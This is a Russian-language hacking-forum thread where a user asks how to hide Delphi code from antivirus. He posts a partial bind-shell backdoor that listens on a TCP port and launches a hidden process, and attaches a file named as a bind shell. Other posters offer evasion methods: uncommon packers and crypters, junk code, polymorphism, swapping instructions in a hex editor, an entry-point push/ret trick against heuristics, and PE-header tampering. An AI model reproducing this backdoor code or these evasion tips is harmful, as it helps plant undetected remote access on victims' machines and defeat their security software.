Есть код для делфи, который надо вставить в программу, но антивирус этот код считает как вирус. Можно ли изменить код или программу, чтоб антивирус не ркгался.

| Сообщение посчитали полезным:

Можно...

| Сообщение посчитали полезным:

MoonShiner пишет:
Можно...
А как?

| Сообщение посчитали полезным:

GAMe ovER пишет:
А как?
руками маленький любитель троянских лошадок ;)

| Сообщение посчитали полезным:

Red Bar0n пишет:
руками маленький любитель троянских лошадок ;)
Понятно, что не ногами...
Почему сразу троянских...
Тут кто-нить может НОРМАЛЬНО, как можно скрыть код от антивиря??????

| Сообщение посчитали полезным:

Самой простой способ: запаковать каким-нибудь нераспространённым пакером/протектором.

| Сообщение посчитали полезным:

Mifodix
Вроде это кже не действует, покрайне мерее на Каспера. Да и каой нераспространеный

| Сообщение посчитали полезным:

GAMe ovER, на твой вопрос не существует имхо простого решения, которое можно было изложить в одном посте. А расписывать тебе статьи, я думаю, никто не станет. Гугл в помощь!

| Сообщение посчитали полезным:

GAMe ovER
Др.Голова Писал ст0тью про это она все еще актуальна с небольшими изминениями.
все просто либо баловаться с кучей джампов и мусорным кодом либо юзать полиморф с метоморфом либо крипторы всякие и тд ;)

| Сообщение посчитали полезным:

game over, код в студию!

| Сообщение посчитали полезным:

И экспешнов парочку не забудь добавить для усиления эффекта =)

-----
"Пусть видят, что мы не шутим. Стволы для понта, ножи для дела" Lock, Stock & Two Smoking Barrels

| Сообщение посчитали полезным:

WSAStartup($202, WSAData);
FSocket := WSASocketA(PF_INET, SOCK_STREAM, IPPROTO_TCP, nil, 0, 0);
SockAddrIn.sin_family := AF_INET;
SockAddrIn.sin_port := htons(800);
bind(FSocket, SockAddrIn, 16);
listen(FSocket, 0);

| Сообщение посчитали полезным:

while true do
begin
sHandle := accept(FSocket, nil, 0); // ожидаем соединения
if sHandle <> INVALID_SOCKET then
begin
ZeroMemory(@St, SizeOf(TStartupInfo));
St.cb := SizeOf(TStartupInfo);
St.wShowWindow := SW_HIDE;
St.dwFlags := STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW;

| Сообщение посчитали полезным:

хм, чё-то не вериццо, что данный код классифицируецца как заражённый, выкладывай проект, скомпилим посмотрим

| Сообщение посчитали полезным:

короче, у меня отказ в доступе, при отправке остальной части, так что отсылаю исходники данного кода

0fe2_bind_shell.rar.zip

| Сообщение посчитали полезным:

Если хочешь скрыть вирь от анти тогда прочти книгу Криса Касперский комьпютерные вирусы взгляд изнутри и снаружи Yandex тебе в помошь!!!! В инете ее точно можно скачать!!!!

| Сообщение посчитали полезным:

На сайте uinc.ru была статья "Как обойти AVP". Вот ссылка:
<url>hxxp://www.uinc.ru/articles/11/</url>

-----
The truth is out of there...

| Сообщение посчитали полезным:

Red Bar0n пишет:
Др.Голова Писал ст0тью про это она все еще актуальна с небольшими изминениями.
Гы, т.е он писал как отыметь свою же контору ?

| Сообщение посчитали полезным:

fakit пишет:
Гы, т.е он писал как отыметь свою же контору ?
0га именно так, и именно про антивирус касперского.

| Сообщение посчитали полезным:

GAMe ovER можно попробовать посмотреть код дизассемблером и поменять используемые группы команд шестнадцатиричным редактором. Это может сбить с толку сравниватель сигнатур антивирусника

| Сообщение посчитали полезным:

Vedrus пишет:
GAMe ovER можно попробовать посмотреть код дизассемблером и поменять используемые группы команд шестнадцатиричным редактором. Это может сбить с толку сравниватель сигнатур антивирусника


ЛОЛ, и думаешь если ты так над екзешником поиздеваешься, он запуститься???

| Сообщение посчитали полезным:

Vedrus пишет:
GAMe ovER можно попробовать посмотреть код дизассемблером и поменять используемые группы команд шестнадцатиричным редактором. Это может сбить с толку сравниватель сигнатур антивирусника
Собсно ниче нового ты тока что не сказал)
agentru пишет:
ЛОЛ, и думаешь если ты так над екзешником поиздеваешься, он запуститься???
Куда он денеться, если ты правильно все сделаешь.

| Сообщение посчитали полезным:

agentru, а что здесь такого? Просто надо внести изменения так, чтобы размер остался тот же и не накасячить с переходами. Я как-то делал врезку в DLL и посложнее, она как не странно работала.

| Сообщение посчитали полезным:

Vedrus пишет:
а что здесь такого? Просто надо внести изменения так, чтобы размер остался тот же и не накасячить с переходами. Я как-то делал врезку в DLL и посложнее, она как не странно работала.

Я понял о чём ты, взять попереписывать код и на него джамп поставить.....

| Сообщение посчитали полезным:

Совсем не обязательно. Просто ведь есть взаимозаменяемые команды. Этим и можно воспользоваться.

| Сообщение посчитали полезным:

А если у антивиря эвристика включена Или как пробку не учи, а трояна все равно подсадим?

| Сообщение посчитали полезным:

В какой-то статье читал (пока не могу её найти), что эвристику можно заглушить так:
На точку входа ставится такая штука:

push addr
ret
addr:


| Сообщение посчитали полезным:

что-то мне подсказывает, что такая банальность не прокатит

| Сообщение посчитали полезным:

У др.Головы спроси, может под пытками что нить посоветует =)))

| Сообщение посчитали полезным:

Можно ещё попробовать поглумиться над PE-заголовком, эвристики этого не любят.

| Сообщение посчитали полезным: